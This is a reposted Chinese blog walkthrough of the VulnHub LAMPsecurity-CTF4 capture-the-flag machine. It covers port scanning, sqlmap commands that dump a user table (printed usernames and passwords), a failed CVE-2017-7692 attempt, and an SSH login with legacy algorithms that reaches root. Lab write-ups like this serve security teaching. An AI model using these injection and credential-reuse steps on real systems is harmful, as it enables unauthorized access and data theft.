文章总结： 该文档详述了LAMPsecurity-CTF4靶机渗透实战，通过端口扫描发现服务，利用SQL注入获取用户凭据。尝试利用邮件系统漏洞失败后，复用凭据并解决SSH协议兼容性问题成功登录，最终直接获得root权限。过程涵盖信息搜集、注入利用及服务兼容性处理，具有实操参考价值。 综合评分： 75 文章分类： 渗透测试,CTF,实战经验,WEB安全

跟着红队笔记打靶：LAMPsecurity-CTF4

原创

网安热爱者week 网安热爱者week

week的杂货铺

2026年3月9日 22:54 江苏

靶机地址：https://www.vulnhub.com/entry/lampsecurity-ctf4,83/

大佬的视频：【「红队笔记」靶机精讲：LampSecurityCTF4 – SQL注入原理，手动注入和SQLmap自动化注入一起呈现。】https://www.bilibili.com/video/BV1ue4y1S7Zm?vd_source=3caf2dac9c9273de4d9b0fead4712250

1. 信息搜集：

1.1. 主机发现：

144是靶机。

1.2. 端口扫描：

TCP：

UDP：

1.3. 详细扫描：

nmap的默认脚本扫描：有用的有一个sql

2. 渗透测试：

在80的sql目录下：

sqlmap跑一下：

sudo sqlmap -u 'http://192.168.137.144/?page=blog&id=2' --dbssudo sqlmap -u 'http://192.168.137.144/?page=blog&id=2' -D ehks --tablessudo sqlmap -u 'http://192.168.137.144/?page=blog&id=2' -D ehks -T user --columnssudo sqlmap -u 'http://192.168.137.144/?page=blog&id=2' -D ehks -T user -C user_name,user_pass --dump

dstevens ilike2surfachen seventysixerspmoore Homesitejdurbin Sue1978sorzek pacmanghighland undone1

restricted/ 这个目录可以使用上面的账密进行登入

可以看到两个文件

一个让我们去admin  一个让我们去mail

这里本来去试了/admin目录 进去只有一个存储xss 没法拿shell

然后 dstevens ilike2surf 这个账密可以登入mail:

这里发现有一个历史漏洞 CVE-2017-7692

然后用了poc去尝试 应该是设置了禁止发邮件 导致执行失败了。

里面也有一些邮件 但是没啥有用的

查看邮件会发现一个新的日历页面 但是没有什么办法利用。

真正的测试的话 应该会测试社工一下。。。

尝试直接使用ssh进行登入：

不同ssh版本和协议可能有区别 所以会出现这个报错。

就跟着报错的要求去一点点匹配就好。

最后的命令是这个：

sudo ssh -oKexAlgorithms=+diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa [email protected]

这里加入ssh-dss会报错 ，因为我的kali的ssh的版本太新了 已经不支持这个dss了 第一次连接会有点慢。

然后就root了。。。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：week的杂货铺 网安热爱者week 网安热爱者week《跟着红队笔记打靶：LAMPsecurity-CTF4》